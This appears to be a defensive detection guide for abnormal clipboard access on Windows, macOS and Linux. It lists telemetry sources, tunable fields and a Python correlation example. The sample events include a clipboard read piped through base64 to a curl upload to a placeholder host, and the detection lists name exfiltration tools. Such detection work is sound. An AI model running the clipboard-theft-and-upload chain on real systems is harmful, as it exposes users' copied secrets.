Detection of clipboard access via OS utilities (e.g., clip.exe, Get-Clipboard) by non-interactive or abnormal parent processes, potentially chained with staging or exfiltration commands.

| Data Component | Name | Channel |
|---|---|---|
| Process Creation (DC0032) | WinEventLog:Sysmon | EventCode=1 |
| Process Access (DC0035) | WinEventLog:Sysmon | EventCode=10 |

| Field | Description |
|---|---|
| TimeWindow | Defines how far back to look for parent-child relationships and follow-on network activity. |
| UserContext | Filters based on service vs. interactive users to reduce noise. |
| ParentProcessName | Tunable list of expected/benign clipboard accessors. |

Detection of pbpaste/pbcopy clipboard access by processes without terminal sessions or linked to launch agents, potentially staged for collection.

| Data Component | Name | Channel |
|---|---|---|
| Process Creation (DC0032) | macos:unifiedlog | process |

| Field | Description |
|---|---|
| ExecutionChainLength | How many chained or embedded processes to track for correlation. |
| TerminalSession | Whether the pbpaste/pbcopy action is tied to a user terminal. |
| BinaryPath | Adjust if clipboard tooling is relocated (e.g., /opt/empyre/pbpaste). |

Detection of xclip or xsel access to clipboard buffers outside of user terminal context, especially when chained to staging (gzip, base64) or network exfiltration (curl, scp).

| Data Component | Name | Channel |
|---|---|---|
| Process Creation (DC0032) | auditd:SYSCALL | execve |

| Field | Description |
|---|---|
| ClipboardCommand | Tool used (xclip, xsel, custom clipboard-read binary). |
| CorrelationWindow | Temporal window to chain staging or network activity with clipboard access. |
| TTYLinked | Was access linked to an interactive user TTY? |
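As an added example that is not part of the page, the Python below applies the three analytics above (Windows, macOS and Linux) to constructed process-creation events: it flags clipboard reads with no interactive session, an unexpected parent, or a staging/exfil tool run by the same user on the same host inside the correlation window. The event field names, the benign-parent list and the 120-second window are assumptions standing in for the tunable ParentProcessName, UserContext/TerminalSession/TTYLinked and TimeWindow/CorrelationWindow parameters.

```python
from datetime import datetime, timedelta

# Clipboard readers, staging tools and exfil tools named on the page.
CLIPBOARD_TOOLS = {"clip.exe", "pbpaste", "pbcopy", "xclip", "xsel"}
STAGING_OR_EXFIL = {"gzip", "base64", "curl", "scp"}
# Assumed tunables: the ParentProcessName allow-list and the CorrelationWindow/TimeWindow.
BENIGN_PARENTS = {"cmd.exe", "explorer.exe", "bash", "zsh", "Terminal"}
CORRELATION_WINDOW = timedelta(seconds=120)

def reads_clipboard(ev):
    """Clipboard read via an OS utility, including PowerShell's Get-Clipboard cmdlet."""
    return ev["image"] in CLIPBOARD_TOOLS or "get-clipboard" in ev["cmd"].lower()

def detect(events, window=CORRELATION_WINDOW, benign_parents=BENIGN_PARENTS):
    """Return (host, image, reasons) for clipboard reads that look abnormal."""
    events = sorted(events, key=lambda e: e["ts"])
    alerts = []
    for i, ev in enumerate(events):
        if not reads_clipboard(ev):
            continue
        reasons = []
        if not ev["interactive"]:  # TTYLinked / TerminalSession / UserContext check
            reasons.append("no-interactive-session")
        if ev["parent"] not in benign_parents:
            reasons.append("parent:" + ev["parent"])
        for later in events[i + 1:]:  # follow-on activity inside the correlation window
            if later["ts"] - ev["ts"] > window:
                break
            same_actor = (later["host"], later["user"]) == (ev["host"], ev["user"])
            if same_actor and later["image"] in STAGING_OR_EXFIL:
                reasons.append("chained:" + later["image"])
        if reasons:
            alerts.append((ev["host"], ev["image"], reasons))
    return alerts

def _ev(host, ts, image, cmd, parent, user, interactive):
    return {"host": host, "ts": datetime.fromisoformat(ts), "image": image,
            "cmd": cmd, "parent": parent, "user": user, "interactive": interactive}

# Constructed sample process-creation events (not real telemetry), one per line.
SAMPLE_EVENTS = [
    _ev("win01", "2024-05-01T10:00:00", "clip.exe", "clip.exe", "cmd.exe", "alice", True),
    _ev("win01", "2024-05-01T10:05:00", "powershell.exe", "powershell -nop -c Get-Clipboard",
        "wscript.exe", "alice", True),
    _ev("mac01", "2024-05-01T10:10:00", "pbpaste", "pbpaste", "launchd", "bob", False),
    _ev("lx01", "2024-05-01T10:20:00", "xclip", "xclip -o -selection clipboard", "bash", "carol", True),
    _ev("lx01", "2024-05-01T10:20:30", "base64", "base64 -w0", "bash", "carol", True),
    _ev("lx01", "2024-05-01T10:21:00", "curl", "curl -T - https://example.invalid/", "bash", "carol", True),
    _ev("lx01", "2024-05-01T10:30:00", "gzip", "gzip /tmp/notes", "bash", "carol", True),
]
```

The first clip.exe event and the gzip run ten minutes after the xclip read produce no alert, which shows the benign-parent list and the window cutoff doing their job.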